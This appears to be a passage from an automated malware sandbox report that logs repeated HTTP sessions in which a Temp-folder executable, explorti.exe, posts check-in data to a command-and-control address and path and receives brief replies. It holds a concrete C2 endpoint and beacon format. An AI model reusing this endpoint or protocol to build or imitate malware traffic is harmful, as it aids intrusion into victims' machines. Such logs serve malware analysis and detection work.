                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:41.756166935 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.44977377.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:41.863178015 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:42.580399036 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:42.589514017 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:42.817280054 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.44977477.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:42.925442934 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:43.627463102 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:43.631434917 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:43.849529028 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.44977577.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:43.972579956 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:44.682857990 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:44.685906887 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:44.909461021 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.44977677.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:45.021903992 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:45.722275019 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:45.723231077 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:45.944767952 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.44977777.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:46.066132069 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:46.802546978 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:46.803257942 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:47.033916950 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.44977877.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:47.144500017 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:47.857371092 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:47.861205101 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:48.087090969 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.44977977.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:48.206718922 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:48.912866116 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:48.913644075 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:49.138216972 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.44978077.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:49.253915071 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:49.960004091 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:49.960800886 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:50.179233074 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.44978177.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:50.301326990 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:51.001724958 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:51.005486965 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:51.224138975 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.44978277.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:51.332046032 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:52.044487000 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:52.047466040 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:52.267561913 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.44978377.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:52.379122972 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:53.095915079 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:53.103115082 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:53.331283092 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.44978477.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:53.447033882 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:54.148936033 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:54.149723053 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
